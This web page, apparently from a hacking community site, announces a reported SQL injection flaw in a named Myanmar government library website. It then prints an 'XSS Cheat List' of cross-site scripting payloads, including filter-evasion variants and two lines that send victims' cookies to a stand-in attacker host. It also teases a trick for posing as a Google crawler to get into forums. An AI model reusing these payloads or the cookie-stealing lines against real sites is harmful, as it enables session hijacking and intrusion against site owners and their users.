PlanetCreator has reported another critical SQL Injection (vulnerability) on National Library, Ministry of Culture Website http://www.nlm.gov.mm/

SQL injection is a code injection technique that exploits a security vulnerability occurring in the database layer of an application. The vulnerability is present when user input is either incorrectly filtered for string literal escape characters embedded in SQL statements or user input is not strongly typed and thereby unexpectedly executed.

This vulnerability has been alerted to :- [email protected]

If you want to see detail of this vulnerability Click Here (Note :- Registered Member Only- If you are not PlanetCreator.Net Member Sign up Here)

We hope that your security staff will look into this issue and fix it as soon as possible.

Explore More

XSS Cheat List

<script>alert(1);</script> <script>alert('XSS');</script> <script src="http://www.evilsite.org/cookiegrabber.php"></script> <script>location.href="http://www.evilsite.org/cookiegrabber.php?cookie="+escape(document.cookie)</script> <scr<script>ipt>alert('XSS');</scr</script>ipt> <script>alert(String.fromCharCode(88,83,83))</script> <img src=foo.png onerror=alert(/xssed/) /> <style>@im\port'\ja\vasc\ript:alert(\"XSS\")';</style> <? echo('<scr)'; echo('ipt>alert(\"XSS\")</script>'); ?> <marquee><script>alert('XSS')</script></marquee> <IMG SRC=\"jav&#x09;ascript:alert('XSS');\"> <IMG SRC=\"jav&#x0A;ascript:alert('XSS');\"> <IMG SRC=\"jav&#x0D;ascript:alert('XSS');\"> <IMG SRC=javascript:alert(String.fromCharCode(88,83,83))> "><script>alert(0)</script> <script src=http://yoursite.com/your_files.js></script> </title><script>alert(/xss/)</script> </textarea><script>alert(/xss/)</script>

Read More

How to “become” a google bot

What you’ll need: Firefox, The Modify Headers extension for firefox. What you can do: Many sites allow google to look into their forums, in order to get more traffic by

Read More

Single-line attack infects thousands of Web sites

Thousands of Web sites have fallen victim to an attack using just one line of code that maliciously re-directs browsers via Javascript to servers that are hosting a variety of

Read More